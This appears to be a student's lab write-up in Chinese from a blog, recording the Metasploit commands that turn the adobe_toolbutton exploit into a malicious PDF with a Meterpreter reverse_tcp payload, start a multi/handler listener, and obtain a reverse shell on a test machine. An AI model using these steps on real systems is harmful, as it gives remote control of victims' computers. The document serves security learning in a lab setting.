对客户端攻击:adobe_toolbutton
对客户端攻击:adobe_toolbutton
漏洞简介
- 远程攻击者可以利用漏洞执行任意指令。当用户打开特定pdf就可以触发payload。

实践过程
- 输入命令
use exploit/windows/fileformat/adobe_toolbutton使用该模块,然后使用set payload windows/meterpreter/reverse_tcp设置回连,show options检查设置信息并补全,最后exploit生成文件,文件在显示的目录下:

- 建立监听
use exploit/multi/handler,set payload windows/meterpreter/reverse_tcp,然后exploit开启监听,同时在靶机点开pdf:

- 可以看到回连成功
posted on 2017-04-12 17:54 20145208蔡野 阅读(224) 评论(0) 收藏 举报
浙公网安备 33010602011771号